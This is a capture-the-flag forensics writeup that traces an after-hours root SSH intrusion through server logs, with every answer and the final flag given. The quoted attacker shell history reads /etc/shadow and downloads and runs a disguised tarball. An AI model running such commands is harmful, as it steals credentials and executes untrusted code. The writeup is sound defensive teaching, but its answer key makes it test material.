An unusual sighting
We are given the following files:
$ file *
bash_history.txt: ASCII text
sshd.log: ASCII text
These are files from a Linux server: bash_history.txt holds the history of commands executed in Bash, whereas sshd.log is a log of events related to SSH sessions.
We have a remote instance where we must answer some questions:
$ nc 94.237.51.149 43642
+---------------------+---------------------------------------------------------------------------------------------------------------------+
| Title | Description |
+---------------------+---------------------------------------------------------------------------------------------------------------------+
| An unusual sighting | As the preparations come to an end, and The Fray draws near each day, |
| | our newly established team has started work on refactoring the new CMS application for the competition. |
| | However, after some time we noticed that a lot of our work mysteriously has been disappearing! |
| | We managed to extract the SSH Logs and the Bash History from our dev server in question. |
| | The faction that manages to uncover the perpetrator will have a massive bonus come the competition! |
| | |
| | Note: Operating Hours of Korp: 0900 - 1900 |
+---------------------+---------------------------------------------------------------------------------------------------------------------+
Note 2: All timestamps are in the format they appear in the logs
Question 1
What is the IP Address and Port of the SSH Server (IP:PORT)
This question is quite easy to answer, because this IP and port appear in many occurrences in the sshd.log file:
[2024-01-19 12:59:11] Server listening on 0.0.0.0 port 2221.
[2024-01-19 12:59:11] Server listening on :: port 2221.
[2024-01-28 15:24:23] Connection from 100.72.1.95 port 47721 on 100.107.36.130 port 2221 rdomain ""
...
So, the server is at 100.107.36.130, and listens on port 2221 for SSH connections:
> 100.107.36.130:2221
[+] Correct!
Question 2
What time is the first successful Login
The first successful login is here, because it says “Accepted password for root”:
...
[2024-02-13 11:29:50] Connection from 100.81.51.199 port 63172 on 100.107.36.130 port 2221 rdomain ""
[2024-02-13 11:29:50] Failed publickey for root from 100.81.51.199 port 63172 ssh2: ECDSA SHA256:NdSnAx2935O7s2KX4LyvIV0gCzzQW5eXYoiiIBosqNE
[2024-02-13 11:29:50] Accepted password for root from 100.81.51.199 port 63172 ssh2
[2024-02-13 11:29:50] Starting session: shell on pts/2 for root from 100.81.51.199 port 63172 id 0
...
> 2024-02-13 11:29:50
[+] Correct!
Question 3
What is the time of the unusual Login
The unusual login is this one: it is a root login, the connection comes from an IP address (2.67.182.119) that is nothing like the ones seen elsewhere in the SSH log, and it happens at 04:00, well outside Korp's stated operating hours of 0900 - 1900:
...
[2024-02-19 04:00:14] Connection from 2.67.182.119 port 60071 on 100.107.36.130 port 2221 rdomain ""
[2024-02-19 04:00:14] Failed publickey for root from 2.67.182.119 port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
[2024-02-19 04:00:14] Accepted password for root from 2.67.182.119 port 60071 ssh2
[2024-02-19 04:00:14] Starting session: shell on pts/2 for root from 2.67.182.119 port 60071 id 0
[2024-02-19 04:38:17] syslogin_perform_logout: logout() returned an error
[2024-02-19 04:38:17] Received disconnect from 2.67.182.119 port 60071:11: disconnected by user
[2024-02-19 04:38:17] Disconnected from user root 2.67.182.119 port 60071
...
> 2024-02-19 04:00:14
[+] Correct!
Question 4
What is the Fingerprint of the attacker's public key
The fingerprint of the public key can be taken from the previous evidence:
...
[2024-02-19 04:00:14] Failed publickey for root from 2.67.182.119 port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
...
> OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
[+] Correct!
Question 5
What is the first command the attacker executed after logging in
Now we need to analyze the commands executed by the attacker, so let’s switch to bash_history.txt, focusing on commands executed around the previous timestamp (2024-02-19 04:00:14):
...
[2024-02-16 14:40:47] python ./server.py --tests
[2024-02-19 04:00:18] whoami
[2024-02-19 04:00:20] uname -a
[2024-02-19 04:00:40] cat /etc/passwd
[2024-02-19 04:01:01] cat /etc/shadow
[2024-02-19 04:01:15] ps faux
[2024-02-19 04:02:27] wget https://gnu-packages.com/prebuilts/iproute2/latest.tar.gz -O /tmp/latest_iproute.tar.gz
[2024-02-19 04:10:02] tar xvf latest.tar.gz
[2024-02-19 04:12:02] shred -zu latest.tar.gz
[2024-02-19 04:14:02] ./setup
[2024-02-20 11:11:14] nvim server.py
...
So, the first command is whoami:
> whoami
[+] Correct!
Question 6
What is the final command the attacker executed before logging out
The answer here is already shown in the previous output: ./setup, executed at 04:14:02, is the last command before the 04:38:17 disconnect seen in sshd.log (the next history entry is from the following day):
> ./setup
[+] Correct!
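The checks used in Questions 3 to 6 can be scripted. The following Python is an added example, not part of the original writeup or the challenge: it flags accepted logins that fall outside the stated operating hours or come from outside an assumed internal range, pairs each with the key fingerprint offered on the same connection, and pulls the bash_history commands that fall inside that session window. The internal range 100.64.0.0/10 is my assumption (every non-attacker address in the log sits there), and the embedded sample lines are a constructed subset of the writeup's logs.

```python
import re
import ipaddress
from datetime import datetime

# Constructed sample: a subset of the sshd.log / bash_history.txt lines quoted in the writeup.
SSHD_LOG = """\
[2024-02-13 11:29:50] Accepted password for root from 100.81.51.199 port 63172 ssh2
[2024-02-19 04:00:14] Failed publickey for root from 2.67.182.119 port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
[2024-02-19 04:00:14] Accepted password for root from 2.67.182.119 port 60071 ssh2
[2024-02-19 04:38:17] Disconnected from user root 2.67.182.119 port 60071
"""
BASH_HISTORY = """\
[2024-02-16 14:40:47] python ./server.py --tests
[2024-02-19 04:00:18] whoami
[2024-02-19 04:01:15] ps faux
[2024-02-19 04:14:02] ./setup
[2024-02-20 11:11:14] nvim server.py
"""
TS = "%Y-%m-%d %H:%M:%S"
ACCEPT = re.compile(r"\[(.+?)\] Accepted \w+ for (\S+) from (\S+) port (\d+)")
FAILKEY = re.compile(r"\[(.+?)\] Failed publickey for \S+ from (\S+) port (\d+) ssh2: \S+ SHA256:(\S+)")
DISC = re.compile(r"\[(.+?)\] Disconnected from user \S+ (\S+) port (\d+)")
HIST = re.compile(r"\[(.+?)\] (.*)")
# Assumption (not stated on the page): the dev team's hosts all live in 100.64.0.0/10.
INTERNAL = ipaddress.ip_network("100.64.0.0/10")

def unusual_logins(sshd_log, open_hour=9, close_hour=19):
    """Accepted logins outside open/close hours or from outside INTERNAL, with the key offered first."""
    offered, out = {}, []
    for line in sshd_log.splitlines():
        if m := FAILKEY.match(line):
            offered[(m[2], m[3])] = m[4]  # fingerprint tried on this (ip, port) before password auth
        elif m := ACCEPT.match(line):
            ts, ip, port = datetime.strptime(m[1], TS), m[3], m[4]
            after_hours = not (open_hour <= ts.hour < close_hour)
            external = ipaddress.ip_address(ip) not in INTERNAL
            if after_hours or external:
                out.append({"login": ts, "ip": ip, "port": port,
                            "fingerprint": offered.get((ip, port)), "logout": None})
        elif m := DISC.match(line):
            for e in out:  # close the still-open session on the same (ip, port)
                if e["ip"] == m[2] and e["port"] == m[3] and e["logout"] is None:
                    e["logout"] = datetime.strptime(m[1], TS)
    return out

def session_commands(bash_history, start, end):
    """Commands whose history timestamp falls inside the [start, end] session window."""
    return [m[2] for line in bash_history.splitlines()
            if (m := HIST.match(line)) and start <= datetime.strptime(m[1], TS) <= end]
```

The first and last entries of `session_commands(...)` for the flagged session are the answers to Questions 5 and 6, and the `fingerprint` field is the answer to Question 4.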
Flag
At this point, we have the flag:
[+] Here is the flag: HTB{4n_unusual_s1ght1ng_1n_SSH_l0gs!}